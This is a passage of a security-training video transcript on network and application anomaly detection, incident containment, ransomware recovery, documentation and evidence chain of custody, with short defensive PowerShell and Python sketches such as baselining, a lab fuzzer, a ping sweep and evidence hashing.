that would show up as bandwidth consumption on your network if your hosts are infected and being used that way. In the same sense, if a DDoS (distributed denial of service) attack is being executed because machines on your network are compromised and are actually executing the attack, that again will show up as bandwidth consumption. So, like everything, we have to remember that a slowdown in network performance could be a result of the network being used properly or improperly.
Beaconing is used by some network topologies such as token ring where stations will beacon when they don't
receive a transmission from their upstream neighbor. Now, at the same time, beaconing can be used in other
ways as a heartbeat, for example, between cluster nodes. It's used to detect when a cluster member is down
because we haven't received a heartbeat packet from it recently. So the absence of a heartbeat could indicate a
problem – in this case, with a network link or a cluster node.
So network usage baselines then establish what is normal. And what you might even do is use a packet
capturing tool to capture traffic during normal business hours over time, perhaps a week and then calculate
statistics for the normal network load, number of packets in and out, the type of traffic on the wire, and so on.
So this allows for easy identification of abnormal activity, like unusual peer-to-peer communication,
which could be indicative of a worm propagating itself over the network or we might have large volumes of
traffic to or from a specific host or subnet or VLAN. That could be suspicious if we don't normally see that on
the network.
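As a very rough, hedged sketch of that idea from a single Windows host – real baselining would normally use packet captures or flow data collected over a longer window, and the output path is just a placeholder – you could snapshot established connections grouped by remote port and compare such snapshots over time:

```powershell
# Count established TCP connections by remote port as a crude point-in-time snapshot
Get-NetTCPConnection -State Established |
    Group-Object -Property RemotePort |
    Sort-Object -Property Count -Descending |
    Select-Object -Property Name, Count |
    Export-Csv -Path "C:\Baselines\tcp-snapshot.csv" -NoTypeInformation
```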
And also, we might want to make sure we have alerts in place to allow technicians to be notified when these
things are happening. Now that might be done within your operating system or with an intrusion detection or
prevention system. Then there's the issue of rogue network devices – devices that should not be on the
network. Now we can control what devices and users can get on the network in the first place – whether it's
wired or wireless – using IEEE 802.1X compliant devices like VPN appliances or Ethernet switches or
wireless access points.
So, if they conform to IEEE 802.1X, we might limit their access to the network by using a centralized
RADIUS authentication server. At the same time, even for the most basic Wi-Fi environment, MAC filtering is something that we could do to limit which devices can connect. Of course, it's very easy to spoof a MAC address with freely available tools, but MAC filtering will at least keep casual users from connecting to our Wi-Fi network. Certainly, Wi-Fi MAC filtering is not the only thing you should do to secure a wireless network; with defense in depth, it's always a combination of techniques.
At the same time, we don't want to have rogue DHCP servers. In the Windows Active Directory world, there's
this concept of DHCP server authorization where, when a new DHCP server is brought online, it needs to be
authorized in Active Directory before it's actually active on the network. Now that doesn't stop a malicious
user from firing up a Windows host if they can get on the network in the first place and firing up a rogue
DHCP server or rogue access point. Then there's the issue of ARP cache poisoning where an attacker
essentially will fool all the machines on the network by giving them the MAC address of their malicious
station as the router.
So basically all traffic is funneled through the attacker's system and they get to see everything that way. Now
what should we be doing, at least on an ongoing periodic basis, to see if we have issues on the network,
besides running intrusion detection and prevention systems and periodically capturing network traffic? Well, you might also run network scans and sweeps to discover and fingerprint network devices, for example, to
discover if new devices are on the network that were not there before that should not be.
Now also, when a network card is put into promiscuous mode when traffic is being captured on the network,
this can actually be detected. So you should make sure you have a solution that can detect this so that if we've
got a malicious user capturing network traffic, it can send an alert to us. Also we might want to track for
abnormal connections from a network device to other devices. For example, it's not normal perhaps on our
network to be probing for TCP port 22 from one host against many others. This could be indicative of some
kind of reconnaissance by a malicious user looking for SSH daemons running on devices.
So this can be configured. Then, in some cases within your operating system software, you can generate alerts
or you might have a third-party tool, or again it could be part of your intrusion detection and prevention
system to trigger an alarm if too many of these SSH probes, for instance, occur in a short period of time. Now
bear in mind, we have to determine whether it's abnormal or not to have many failed connections such as when
probing ports on machines or failed log in attempts. If you've established a normal usage baseline, it's going to
be pretty easy over time to detect what's abnormal.
[Topic title: Application Symptoms and Response Actions. The presenter is Dan Lachance.] In this video, I'll
talk about application symptoms and response actions.
An application usage baseline establishes what is normal for that application's usage, whether it's on a single
server, multiple servers, or even its effect on the network. Once we've determined what's normal for a specific
application, then we can easily detect anomalous activity. In some cases, applications spawn other background
processes. And this could be legitimately a part of the app or it could be a result of malware being triggered in
the background.
In some cases, Failover Clustering can be used to deal with application unavailability. Failover Clustering
means we've got two or more servers working together to offer the same service. And, if one server fails, the
other server or servers can pick up the slack. For Failover Clustering to be effective, all of the nodes in the
cluster need to be using the same shared storage so that they have the same up-to-date data.
User account activity – whether it's the creation of user accounts, modification, deletion, or usage – should be
audited. Of course, we're going to have regular end user accounts for users to authenticate and access network
resources. But some applications have background services that need a specific account to run. Now we should
follow the principle of least privilege when building these service accounts to only grant the privileges
required and nothing more.
But some operating systems like Windows will allow the creation of a managed service account. This is a
secure practice because a managed service account can automatically change its password based on the domain
password change interval, whereas just building a dummy user account for the service requires administrators
to change the password for that account periodically – hopefully – rather than using a password that never changes for the service account.
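As a hedged illustration of the managed service account idea – the account name, DNS name, and group below are made up, and this assumes the ActiveDirectory PowerShell module plus a KDS root key already exist in the domain – creating and installing a group managed service account might look like this:

```powershell
Import-Module ActiveDirectory

# Create a group managed service account (gMSA); names here are hypothetical
New-ADServiceAccount -Name "svcAppPool" `
    -DNSHostName "svcAppPool.fakedomain.local" `
    -PrincipalsAllowedToRetrieveManagedPassword "AppServers"

# On the server that will run the service under this account:
Install-ADServiceAccount -Identity "svcAppPool"
Test-ADServiceAccount -Identity "svcAppPool"   # returns True if the account is usable
```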
Malicious users might also build user accounts that look benign. It might be a normal looking user name that
doesn't stand out. And, in fact, it might be used by the malicious user as a back door. And it might even have
elevated privileges. So you might not notice this when you're just looking at user accounts especially in a large
environment with thousands of them. But, if you're auditing this, you might notice that it's strange that at three
o'clock in the morning in your timezone a new user account was created because that might not be normal.
Applications should be thoroughly tested during development and testing phases for how they behave when
they receive unexpected input because that could result in unexpected output. Fuzz testing throws lots of random data that an app might not expect at it in order to observe its behavior – to make sure it doesn't crash, reveal sensitive information, and so on. Sometimes specially crafted input, whether data entered in web site form fields or a certain network packet sent to an app, can cause it to reveal data that it otherwise should not.
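As a very small, hedged sketch of that fuzzing idea – the URL and form field are placeholders, and something like this should only ever be run against a lab system you're authorized to test – random input can be thrown at a form and unexpected errors flagged:

```powershell
# Throw random-length strings at a hypothetical test form and flag unexpected errors
$target = "http://testapp.local/feedback"   # placeholder URL for a lab system

1..25 | ForEach-Object {
    $length = Get-Random -Minimum 1 -Maximum 5000
    $fuzz   = -join (1..$length | ForEach-Object { [char](Get-Random -Minimum 32 -Maximum 127) })
    try {
        Invoke-WebRequest -Uri $target -Method Post -Body @{ comment = $fuzz } -TimeoutSec 5 | Out-Null
    } catch {
        # Server errors, crashes, or timeouts on particular inputs are worth investigating
        Write-Warning "Input of length $length triggered: $($_.Exception.Message)"
    }
}
```

Inputs like these are exactly the kind of thing that can coax an application into revealing data it should not.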
So the transmission of private data to a third party might be revealed unintentionally. Or, in the case of a
ransomware infection, the host might periodically reach out over the Internet and contact a command and
control center where it receives instructions from a malicious user on how to proceed with encryption.
Outbound firewall rules can also be very helpful. Everyone is concerned about inbound firewall rules and
certainly they're relevant. But also at the host level and network level, outbound firewall rules should track
anomalous activity.
Is it normal that we've got our hosts contacting a certain part of the world, which could be the location of a hacker's command and control server, to receive instructions? Application service interruptions can also take the form of denial of service attacks or DoS attacks. A DoS attack essentially renders a system unusable for
legitimate uses. It could be as simple as making a machine crash or it could be flooding a machine with
network traffic such that legitimate users can't even get in.
Now what do we do about that? You know, if we've got a web server, we're not going to block port 80 because
then legitimate users can't get into it. So there are many security solutions even in the form of hardware
appliances that will look for irregular traffic flows such as a lot of traffic coming from one host or a certain
network within a short period of time. And simply block those hosts from communicating with the application,
for example, a web app on port 80.
Memory overflows are also called buffer overflows. What can happen is that a malicious user is granted elevated privileges due to the fact that software might not be properly checking what's being fed into it. For
instance, a web form with a field where a user puts in a lot of extra data that isn't being validated server side
could result in elevated privileges when that's sent back to the server or it could even corrupt memory in the
application and freeze the application or even cause the operating system to hang.
Now we're not going to run around each and every host and check all of these things, instead we would use
things like host-based intrusion detection systems or host-based intrusion prevention systems. There are also
network counterparts that would be relevant if our application is distributed or has a lot to do with network
traffic. Now an intrusion detection system differs from a prevention system in that the prevention system can not only detect, log, and alert about suspicious activity, but can also take steps to prevent it from continuing.
Now you might have to configure it specifically in your environment for your specific application or over time
depending on the solution it can learn what's normal, learn what's suspicious and automatically make a
decision by itself.
[Topic title: Incident Containment. The presenter is Dan Lachance.] In this video, I'll discuss incident
containment.
So, when something negative happens, what is the incident response plan, which roles do people have, and what tasks should they perform to contain an incident? So we're talking about stopping some kind of a malicious
attack where we can resume business operations as quickly as possible and limit damage to sensitive IT
systems and data.
An intrusion prevention system or IPS can be used at the host level or at the network level. Either way, an
intrusion prevention system will detect anomalous activity. Now that can only happen if it knows what normal
activity is for usage of an application or usage of the network. And we can configure it for our specific usage
in our environment, which is usually what is required. But an intrusion prevention system can not only detect, log, and alert administrators about issues, it can also be configured to take steps to prevent them from continuing
such as blocking firewall ports or shutting down certain services.
[The four Containment techniques are Segmentation, Isolation, Removal, and Reverse
engineering.] Containment techniques include things such as segmentation where we might isolate a machine
or an entire network from the rest of the network, for example, if we detect a malware infection. Now part of
the incident response plan might dictate that a network technician unplugs a switch from a master high-level
switch in the hierarchy to prevent the spread of a worm. There's also the removal of problems such as the
removal or eradication of malware on a machine perhaps by booting through alternative means because often
you can't really cleanse a machine correctly – at least completely and entirely – from malware infections
without booting through alternative means because sometimes operating system files themselves are infected
and spawned during startup.
In some cases, reverse engineering might also be used for incident containment to take a look at, for instance,
what a piece of malware did. So we can learn more about it to prevent future infections or to build effective
antimalware scanning tools. When containing incidents, we need to ensure that the attack is properly contained
and ideally stopped in its tracks. So we could unplug malware-infected devices or networks. We could block
wireless device connectivity, for example, by jamming transmissions or using a Faraday cage or bag. We could
also remotely wipe mobile devices that are lost or stolen to prevent sensitive data from getting into the hands of unauthorized users.
If your environment is using PKI – public key infrastructure – certificates for authentication to services, then
you could revoke the PKI certificate, for example, for a user account that we know is breached or if there's a
PKI certificate tied to a smartphone that's been lost or stolen. We can also in addition to wiping the device,
revoke the PKI certificate. Revoking a PKI certificate is similar to revoking a driver's license. It's no longer
valid and cannot be used. So this would prevent connectivity to services requiring PKI certificate
authentication.
We could also take servers that are compromised offline immediately. Now we need to have a plan in place
ahead of time so this is done properly and that we have some other way of continuing business operations such
as a failover solution being in place if we have to take a server offline. In some cases, we also need to make
sure that we preserve the integrity of evidence that might be used in a court of law. So it needs to be
admissible.
We want to make sure that evidence isn't tainted during containment. So we might generate unique hashes of
original data and then work only with copies or backups of that data. So we always have the original data at the
time it was seized in its original form.
The chain of custody needs to be followed, and we need documentation of how it was followed, such as file system hashing to prevent evidence from being tampered with. We should be able to track where evidence was, how it was contained, where it was stored, how it was moved, and so on. And this might be required for evidence admissibility.
The removal and restoration of affected IT systems and their data is what we're concerned with here. So all
steps that we take when we eradicate a problem and recover systems and data need to be documented. This
should also be planned ahead of time in a disaster recovery plan. There should be continuous improvement of
security controls to ensure that they are effective in protecting IT systems and data. As we know, the threat
landscape is always changing as related to IT systems. So, in response to that, we've got to continuously keep
verifying that our security mechanisms are doing their jobs.
Eradication techniques of things like infections include reconstruction or reimaging of systems, sanitization of
storage media, and secure disposal of equipment even when that equipment reaches end of life. Now let's say,
for example, that our network has been infected with ransomware. Now ransomware infections often come in
the form of some kind of phishing attack where users unwittingly open a file attachment from an e-mail
message or click on a link and then the ransomware is unleashed.
Now the ransomware will seek to encrypt files that the infected system has write access to. And, of course, if
that's an administrative station, that could be a lot of write access. So a lot of data could be encrypted. And the
malicious user will then, of course, require some kind of a ransom payment, usually in the form of Bitcoin, before a decryption key – if it's even provided at all – would be provided.
Now, in the case of ransomware, one way to mitigate that is to restore systems. And, for that to happen,
technicians need to be aware of the incident response plan and their role in it, what they should do, and the sequence of steps they should take. So reinstallation of systems could be manual or you might use an imaging solution to reapply images.
But, when you restore a system, you've got to make sure you've got the latest patches, you should also – of
course – immediately scan for malware, and you might even restore, or in some cases, reissue PKI certificates
if PKI certificate authentication is being used. Now still talking about the ransomware example, what about
data? It's one thing to reimage systems and get them up and running. But what about data? Well, ideally we
want to always have an offline backup location elsewhere. And that might even be in the cloud.
And we need to ensure that backups are clean. So, if we've got a ransomware infection on an administrative
station and that administrative station also has write access to the backup location – for instance – in the cloud,
then that could also mean that our cloud backup is infected with ransomware and encrypted and we can't do
anything about it. So we want to make sure our backups are clean, stored offline. And, if we have to restore it,
then we should certainly scan it for malware infections. And then, of course, when we have any type of issue,
we always need to monitor our solution to ensure that the problem has been eradicated.
So we always need to have offline backups of important data because in the case of ransomware which is
absolutely rampant these days, it won't be able to touch our offline backups. Now, in some cases, unfortunately
some people think that it might be more sensible to pay the ransom because it appears to be cheaper than
paying the IT team to do an entire system and data recovery. Bear in mind, paying a ransom never guarantees –
in this case – that you'll get a decryption key.
With sanitization, we can overwrite media with multiple passes of random data. And there are specific tools
that may have to be used depending on laws or regulations that apply to the organization. Degaussing is a
technique whereby a strong magnetic field is applied to magnetic storage media essentially to erase it. There's
always the option of remotely wiping mobile devices that are lost and stolen to prevent sensitive apps or data
from being used by unauthorized users.
There's always the factory reset of equipment to remove the configuration. This is going to be important if our
equipment has reached end of life and we might be donating it to charities or schools or selling it so it can be
used by someone else. I've seen cases where a router, for instance, purchased from eBay still has the
configuration for the network on which it was running in the past.
Sanitization completion forms are normally required to be filled out properly and submitted before, after, or in some cases even during sanitization to ensure that we have a record – a paper trail, essentially – of
sanitization efforts. Secure disposal is also very important when it comes to things like the physical destruction
of media. Maybe that's what's required, for example, for a military institution whereby we might actually shred
storage media physically, like hard disk platters or USB thumb drives, or maybe they're burned, or maybe holes are even drilled into disk platters, rendering them unusable.
In this video, you will identify positive outcomes that have been learned from incidents.
Objectives
[Topic title: Lessons Learned. The presenter is Dan Lachance.] As people, we like to think that we learn from
past mistakes. The same is true with organizations, and their IT systems, and data. In this video, we'll talk
about lessons learned. Lessons learned rely on incident documentation so that we can prevent similar
occurrences in the future. Or if we can't prevent it, we can respond to it in a better manner. So essentially we
are learning from past events. Now one way that this works well is by holding a meeting about a specific negative incident after it has occurred. But what types of things would be discussed in this type of post-incident
meeting?
Well, one of the things we'd want to do is talk about who or what discovered the incident. We want to make sure that this can be done at an early stage, for example, with malware infections. We can also determine what
caused the incident and what the affected scope was. So if it's ransomware, for example, that might have been
caused by a user opening a file attachment that they shouldn't have opened. So user awareness and training,
once again, becomes an overall important theme. We would then look at whether or not the incident response that took place was effective: was it able to contain the incident, was the incident actually eradicated, what steps were taken based on our incident response plan, and was each step effective?
Are the current security controls effective or are they not – which may be why the negative incident occurred in the first place? Not everything is preventable. Bad things simply just happen. But sometimes we can tweak or
make changes to security controls to prevent things from happening. Lessons learned is really based on
documentation. And this needs to be a part of all incident responses, where we take a look at symptoms, the
root cause of the problem, the scope of what was affected by the incident, and each and every action taken. In
some cases, we might also use date and time stamps for this and also track who performed exactly which steps.
And certainly in the case of forensic evidence gathering for chain of custody purposes, this is going to be
especially relevant. In this video, we discussed lessons learned.
After completing this video, you will be able to recognize the impact of threats and design an incident response
plan.
Objectives
Exercise Overview
[Topic title: Exercise: Identify and Respond to Threats. The presenter is Dan Lachance.] In this exercise,
you'll start by listing examples of personally identifiable information. Following that, you'll describe the chain
of custody as well as service-level agreements. Finally, you'll then list host symptoms that prompt incident
response. Now pause the video and consider each of these four bulleted points carefully and then come back to
get some solutions.
Solution
Personally identifiable information or PII examples include bank account information, a person's driver's license number, an e-mail address, a date of birth, a full name, and many other items. The chain of
custody ensures evidence integrity. Documentation is required so that we can track how evidence was
gathered, how it was stored, and how it was transported. We have to have all of this documented in order for data to
be considered admissible in a court of law. And, of course, the detailed rules will vary from region to region.
A service-level agreement or an SLA is a contractual document between a service provider and the service
consumer. In the IT world, it describes the expected levels of an IT service. That means looking at things such as uptime that is promised by a provider for a service, and response time, which could include how quickly something responds in terms of a technical IT solution as well as how long it takes for tech support to respond to an issue. There are then consequences that are also listed if this contract's details are not honored.
And often that comes in the form of credits to the consumer for IT services.
Host symptoms that can prompt incident response include performance degradation, whether that is due to
most of the memory being consumed, running out of disk storage space, or CPU utilization peaking.
Often, if there are unusual processes running in the background that you're not familiar with, it could be
indicative that there is some kind of an infection or some kind of a problem on the machine or maybe software
that was installed without the user's consent.
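As a minimal sketch of flagging such symptoms programmatically – assuming the third-party psutil package is installed and using arbitrary example thresholds – something like the following could be run on a host:

import psutil  # third-party package: pip install psutil

# Arbitrary example thresholds; tune these to your own baseline.
THRESHOLDS = {"cpu": 90.0, "memory": 90.0, "disk": 90.0}

def check_host_symptoms():
    readings = {
        "cpu": psutil.cpu_percent(interval=1),
        "memory": psutil.virtual_memory().percent,
        "disk": psutil.disk_usage("/").percent,
    }
    # Keep only the readings that exceed their threshold.
    return {name: value for name, value in readings.items() if value >= THRESHOLDS[name]}

symptoms = check_host_symptoms()
print("Possible symptoms:", symptoms if symptoms else "none detected")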
Also, system settings changes that weren't done by the user or by the system owner can be suspicious. Things
like the changing of the web browser default page, disabled antivirus updates when they were previously
enabled, remote desktop being turned on on a Windows computer even though it was disabled previously, or even
firewall rules that look a little more relaxed and less strict than they were previously. But bear in mind, these
could be changes made by a system administrator, for example, through Group Policy in a Windows
environment. However, it still warrants our attention.
Table of Contents
In this video, you will learn how to use OEM documentation to reverse engineer products.
Objectives
[Topic title: OEM Documentation. The presenter is Dan Lachance.] In this video, I'll discuss OEM
documentation. OEM stands for original equipment manufacturer. An OEM might make a component, such as a part for a server,
or a final product such as software. An OEM could also define a specific file format that is proprietary to its
use, such as PDF, or produce an operating system like Linux, and so on. So OEMs are equipment
manufacturers not just in the physical sense but also in the software sense – it's both.
Now we can start with the completed product or process and work backward through the end result to reverse
engineer some kind of an OEM solution. The purpose of reverse engineering is to reveal steps that were taken
to arrive at a result. And often, this is done to deconstruct some problem that we've encountered or to
deconstruct something to ensure it's been built in a secured manner.
However, OEM documentation can also be put to malicious use. Because the more that's known about some
kind of a proprietary security solution, the more vulnerable it could become. So think, for example, of an alarm
system for a facility. The more that a malicious person knows about the inner workings of that alarm system,
the more likely that he or she would be able to perhaps circumvent it. And the same type of logic applies to
hardware and software. The more that malicious users know about our network – for example, because they
have performed network reconnaissance and learned what type of tools we're using and what firewall revision
we're running – the more they'll be able to pinpoint where vulnerabilities might
exist.
Proper use means that the more that's known about attacks and malware, the more effective mitigating security
controls can be. And again it all boils down to information being power. Reverse engineering can be done in an
isolated controlled environment. For example, software developers might reverse engineer malware to
determine how it behaves with the purpose of trying to prevent it from happening in the future and to eradicate
current instances of that malware. For software, of course, we would have to create backups and snapshots
prior to attempting reverse engineering.
Reverse engineering could also mean decompiling software or enabling detailed monitoring on software
solutions or even hardware solutions where we observe the behavior as we try different things against it. Of
course, we would have to create and update documentation as we proceed through the reverse engineering.
Now again, often malicious users will perform network scans and try to deduce through reverse engineering
what is being done on a network and how things are configured. In this video, we discussed OEM
documentation.
[Topic title: Network Documentation. The presenter is Dan Lachance.] In this video, I'll talk about network
documentation. Network documentation can be created either manually or we could have an automated process
such as software that scans the network and discovers devices and starts to populate information about what it
discovers. Documentation for the network should be supplied to new IT employees so that they have
familiarity with the network infrastructure and how it's being configured, what things are called, what IP
addressing is in use, and so on.
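As a minimal sketch of automated discovery – assuming Python on a Unix-like host with a standard ping command and an example 192.168.1.0/24 range – a basic ping sweep that could seed network documentation might look like this:

import ipaddress
import subprocess
from concurrent.futures import ThreadPoolExecutor

# Assumes a Unix-style ping command; adjust the flags for Windows ("-n 1").
def is_up(ip):
    result = subprocess.run(["ping", "-c", "1", "-W", "1", str(ip)],
                            stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    return result.returncode == 0

def discover(network="192.168.1.0/24"):
    hosts = list(ipaddress.ip_network(network).hosts())
    with ThreadPoolExecutor(max_workers=64) as pool:
        return [str(ip) for ip, up in zip(hosts, pool.map(is_up, hosts)) if up]

print(discover())  # a starting point for populating network documentation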
Network documentation might also be required when a security audit is being conducted. And it certainly can
be helpful when troubleshooting network performance. Network documentation can also be based on
geography where it identifies different network sites and the site connectivity linking those locations – so the
type of network link, the speed, any redundant links that might be put in place for fault tolerance as well as
internet connections along with their speeds. Now there might also be dedicated leased lines that link different
sites together, which bypass the internet altogether.
Of course, on the network, we're going to have a number of different devices like servers – both physical and
virtual – routers, switches, things like VPN appliances normally placed in a DMZ – a demilitarized zone,
firewall appliances, wireless routers. Due to the nature of having a large network potentially with a lot of users,
a lot of stations, and a lot of these types of network devices, we can see clearly that there is a need for network
documentation. The thing is that documentation has to be kept up to date. So really maintaining this
documentation is an ongoing task.
The configuration of all of these network devices also needs to be documented. Now there are some software
suites that will not only scan the network and discover what's out there but also discover some of the
configuration settings for devices or allow you to input it manually so everything is stored in one place for
your documentation.
Every network device should also have a change log. Larger companies always have a formal change
management process in place. So that before a change occurs, certain documentation must be filled in,
approval must be received before proceeding with making the changes. And so there should be a history of
what's been changed by who, when, and on which device.
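As a minimal sketch of such a change log – the file name and fields here are illustrative assumptions, not a specific product's format – an append-only log entry in Python might look like this:

import getpass
import json
from datetime import datetime, timezone

# Minimal append-only change log; one JSON record per line.
def log_change(device, description, logfile="device_change_log.jsonl"):
    entry = {
        "timestamp": datetime.now(timezone.utc).isoformat(),
        "device": device,
        "changed_by": getpass.getuser(),
        "description": description,
    }
    with open(logfile, "a") as f:
        f.write(json.dumps(entry) + "\n")

log_change("core-switch-01", "Disabled unused port Gi0/12")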
The placement of all of these network devices on the network is paramount. So, when we talk about network
documentation, sometimes a visual network map can also be very useful. Network documentation must also
include the protocols in use, such as network protocols including IPv4 and IPv6. We should also have
documentation that tells us whether we're using routing protocols like RIP, OSPF, or BGP. The specific
network addressing that we're using – whether it's assigned manually or through DHCP – must also be
documented, as well as the specific use of network address ranges.
Now, what that means for instance is that maybe within an address range, addresses 1 to 100 are for user
devices. But maybe 101 to 110 are for network printers. And, maybe beyond that, the rest is for other network
infrastructure equipment like routers, switches, and servers. And of course, authentication requirements are part
of network documentation, what is needed to gain access to the network and resources on it.
So, for instance, is single-factor authentication used or is multi-factor authentication used? In some cases,
both could be in use, where signing in with multi-factor authentication gains you access to different
categories of data that you wouldn't see with single-factor authentication. Network documentation will also
stipulate naming conventions that are in use for consistency reasons, things like server names, names for users,
and names for different types of groups. Group memberships and role-based access control should also
be part of the network documentation. This is especially important, again, when third-party consultants are
coming in for troubleshooting or to perform an audit. And again it's very important for new IT employees to
get familiar with the network. In this video, we discussed network documentation.
After completing this video, you will be able to recognize the importance of maintaining incident response
plans.
Objectives
[Topic title: Incident Response Plan/Call List. The presenter is Dan Lachance.] When it comes to dealing with
security breaches, preparation is everything. In this video, we'll talk about an incident response plan. This type
of plan is often overlooked because essentially what we're doing with it is planning for failure in the sense that
we are planning for things that will fail and what our response to those failures will be. The idea is that
we want a structured approach to security breach management where everyone knows which role they
play in the overall plan. We want to make sure that damage to IT systems and data is minimized while at
the same time being able to resume normal business operations as quickly and efficiently as possible.
The effects of inadequate incident response plans include things such as financial loss, reputation loss, the loss
of a business partnership or contract. The incident response plan needs to be in effect before breaches occur.
And ideally, there will have been time to conduct at least one or more drills or tabletop exercises where the
involved parties know their role and know what the sequence of steps are to deal with these incidents. So
stakeholders must know their role. And there needs to be training and not just for IT technicians.
We want to make sure that there's an awareness for the general user population on the network because they
might be the ones that notify us that there is an incident that is about to occur, is occurring, or already has
occurred. There needs to be an annual review of the incident response plan at a very minimum to keep up with
changing threats. Now bear in mind that we want to make sure that we don't have things like reputation loss or
financial loss. From a PR perspective – public relations – you know, if we don't handle incidents in a
meaningful way, then it can reflect badly on the company. And that can degrade shareholder confidence and so on.
So, for example, think about the Nortel bankruptcy in 2009: Chinese hackers are reported to have been in the
network for many, many years, and nobody really knows exactly what information was gathered or what was
done with it...but a breach like that can contribute to the demise of an organization. Another part of an
incident response plan is a call list. Now the call list of course will allow us to have people that we can contact
in the event of an incident. And we make sure that we know who to contact and in which order.
Data flow diagrams that outline how data gets created and manipulated through IT systems can also be crucial
so that we can minimize downtime for our IT systems. Network diagrams, of course, always help when
troubleshooting with network-based incidents so that we know the placement of servers, routers, switches,
what they're called, what their IP addresses are, and so on. The configuration for logging on our network
devices is also important. Because, for instance, if we've got log forwarding enabled for all of our Linux hosts
to a centralized monitoring system, then we want to make sure that we go to that centralized monitoring system
when we're looking for log events related to those hosts that are forwarding their events to that system.
There should also be step-by-step procedures included within the incident response plan related to things like
reporting incidents, managing incidents, and preservation of evidence – so following the chain of custody.
There should also be listings for escalation triggers, where at some point, if the incident can't be contained or
handled properly, we may have to call upon a third party to deal with it.
The call list contains incident response team contact information. It will include items such as the Chief
Information Officer's contact info, system administrators for various IT systems, legal counsel, law
enforcement, and perhaps even a public relations or PR officer. In this video, we discussed the incident
response plan.
[Topic title: Incident Documentation. The presenter is Dan Lachance.] In this video, I'll discuss incident
documentation. The SANS Institute online has numerous white papers and templates that deal with all things
of security including incident response. Where an incident response form might deal with things such as the
cause of the incident, how it was discovered, the affected scope, containment and eradication details as well as
recovery details.
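As a minimal sketch of what such an incident record might contain – the field names and values below are illustrative assumptions, not the SANS template itself – consider the following Python example:

import json
from datetime import datetime, timezone

# Field names loosely mirror the items mentioned above; values are hypothetical examples.
incident_report = {
    "reported_at": datetime.now(timezone.utc).isoformat(),
    "discovered_by": "Help desk ticket #4821",
    "cause": "Phishing e-mail attachment",
    "affected_scope": ["WIN10-ACCT-03", "file server FS01"],
    "containment": "Host isolated from network",
    "eradication": "Malware removed, credentials reset",
    "recovery": "Host re-imaged and returned to service",
}
print(json.dumps(incident_report, indent=2))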
Here, on the sans.org website, [The www.sans.org web site is open. In www.sans.org web site, the Sample
Incident Handling Forms web page is open which includes two sections titled Security Incident Forms and
Intellectual Property Incident Handling Forms which further includes various links. The Security Incident
Forms includes Incident Contact List, Incident Identification, Incident Survey, and Incident Containment links.
The Intellectual Property Incident Handling Forms includes Incident Form Checklist and Incident Contacts
links.] we can see numerous Security Incident Forms related to incident handling such as an Incident Contact
list, Incident Identification, Incident Survey, Incident Containment, and so on. So, for example, if I were to
click on the Incident Identification template, it opens up a new web browser tab and opens up a PDF [The
PDF contains two sections. The first section General Information includes various fields such as Name, Date
and Time Detected, Location Incident Detected From, Phone, and Address. The second section Incident
Summary includes various fields such as Site, Site point of Contact, and Phone.] where I would put in
information such as the incident identifier's or detector's information, the date and time the incident was
detected, the location, the contact info, of course, of the person that detected it.
So we can use these as a starting point template. They are freely available on the SANS website to start to get
ourselves organized and have a plan in place with proper documentation. External documentation can come in
the form of a service-level agreement or an SLA. Now this is a contractual document between a consumer of a
service and the provider of that service. So, in the case of an incident response provider, we would have an
SLA with them if we were their customer. So we are outsourcing incident response.
So, when we outsource, we might outsource some or all incident response issues to a third party. Now we
might do this because of a lack of time internally to properly handle incidents. We might also have a lack of
skilled expertise to deal with certain issues. Also third parties will perhaps offer 24/7 support and follow-up
support as well. So, if you think about an example such as our internal incident response team being able to
handle incidents maybe related to smartphones or desktops...but what about mainframe systems that are
involved in other locations or what about identity federation problems or public cloud issues?
So those are things that our internal technicians might not be able to handle. So therefore, outsourcing can be a
viable solution. The chain of custody, of course, is always important where the preservation of evidence
integrity is number one when it relates to dealing with external incidents and documentation. After incidents
have occurred, documentation must then be once again updated.
The incident response report will include things such as the cause, how the incident was discovered, the scope,
how the issue was resolved. And ideally through lessons learned, we'll then have some more new information
that we can use to update the existing incident response plan. Because the common theme of a lot of this
documentation for security and security controls and response plans is that it's an ongoing task to keep it up to
date.
So why not take the opportunity, when an incident has already occurred and been dealt with, to learn from it
and update the related documentation at that point. Another part of post-incident
documentation is holding incident meetings and recording the meeting minutes. This should
normally happen within a few weeks after the incident. The lessons learned, of course, are ideal for future
prevention, useful for training and updating documentation, and can also be very useful for tabletop and mock
exercises so that all involved parties know exactly what to do when an incident occurs. In this video, we talked
about incident documentation.
During this video, you will learn how to protect the integrity of evidence you have collected.
Objectives
protect the integrity of collected evidence
[Topic title: Chain of Custody Form. The presenter is Dan Lachance.] In this video, I'll discuss the chain of
custody form. Chain of custody preserves the integrity of evidence. It provides rules and procedures that are to
be followed to ensure that we can trust the integrity of evidence. It also deals with the evidence gathering in
terms of how it was gathered. Evidence storage – where is it stored; where was it moved to, by whom; what
were the dates and times. And also evidence access – who had access to it, was it signed out, was it transferred
between locations, and so on.
This can affect the admissibility in a court of law. Now, of course, laws will vary from region to region around
the world. But the general concept of chain of custody remains the same. With evidence gathering, we have to
think about first responders. They should always be working only from a copy of digital data. Now this can be
done by taking an image or cloning things like hard disks and storage media instead of working on the original.
Working on the original is always a no-no. Write blocking can also be used to prevent changes to data. Write
blocking usually comes in the form of software these days where, for instance, before we image a hard disk to
be used for evidence, we would install write blocking software to ensure that no changes would be made in
that case to that specific device. So examples of gathering evidence would include steps such as immediately
turning off a suspect mobile phone and removing its batteries when it's seized.
Now we would do this to ensure that they can't receive signals from elsewhere to destroy evidence or anything
like that. Faraday bags are used essentially as shielding into which we can place communicating devices so
that they will no longer be able to communicate wirelessly. In some cases, it might be required that we take
photographs of equipment or computer screens in terms of the state they were discovered in. Also we can't
forget other devices like scanners and printers. They could have document history in their logs that could be
relevant in terms of evidence. And, of course, security camera footage can also be very useful.
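As a minimal sketch of verifying that a copied evidence image has not changed – assuming Python and a hypothetical image path – hashing the file when it is acquired and again later might look like this:

import hashlib

# Hash an evidence image in chunks so large files don't have to fit in memory.
def sha256_of(path, chunk_size=1024 * 1024):
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

original = sha256_of("evidence/disk_image.dd")   # hypothetical path, hashed at acquisition
later = sha256_of("evidence/disk_image.dd")      # in practice, recomputed after storage or transport
print("Integrity preserved:", original == later)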
The storage of evidence has to be accounted for. Now we should be storing certain items that are susceptible to
electrostatic discharge or ESD in antistatic bags. Labeling is also crucial in terms of storing evidence and
